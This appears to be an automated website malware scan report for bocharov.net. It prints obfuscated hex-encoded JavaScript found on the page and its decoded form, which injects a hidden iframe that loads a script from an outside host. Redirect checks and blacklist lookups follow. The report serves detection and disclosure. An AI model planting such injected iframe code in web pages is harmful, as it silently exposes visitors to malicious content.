Scanned pages/files
Request | Server response | Status |
http://bocharov.net/ | 200 OK Content-Length: 933 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
function v476ff6bd791e6(v476ff6bd791f4){ var v476ff6bd79205=16; return(parseInt(v476ff6bd791f4,v476ff6bd79205));}
function v476ff6bd79241(v476ff6bd79253){ var v476ff6bd79285=2; var v476ff6bd79269='';for(v476ff6bd79276=0; v476ff6bd79276<v476ff6bd79253.length; v476ff6bd79276+=v476ff6bd79285){ v476ff6bd79269+=(String.fromCharCode(v476ff6bd791e6(v476ff6bd79253.substr(v476ff6bd79276, v476ff6bd79285))));}return v476ff6bd79269;}
document.write(v476ff6bd79241('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6533646336646266207372633D5C27687474703A2F2F737461726C6F6769632E696E2F746F726E6161646F2F636F756E742E7068703F6F3D313F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A333435353736292B2763366562396335645C272077696474683D373438206865696768743D343632207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));
Decoded script:
<SCRIPT>window.status='Done';document.write('<iframe name=e3dc6dbf src=\'http://starlogic.in/tornaado/count.php?o=1?'+Math.round(Math.random()*345576)+'c6eb9c5d\' width=748 height=462 style=\'display: none\'></iframe>')</SCRIPT>
Antivirus reports:
http://bocharov.net/test404page.js | 404 Not Found Content-Length: 290 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bocharov.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 00:12:55 GMT
Accept-Ranges: bytes
ETag: "4ca0107-3a5-509d587c8ec2c"
Server: Apache/2.2.15 (CentOS)
Content-Length: 933
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 10 Dec 2014 04:59:54 GMT
...933 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bocharov.net
Referer: http://www.google.com/search?q=bocharov.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bocharov.net
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bocharov.net/
Result: bocharov.net is not infected or malware details are not published yet.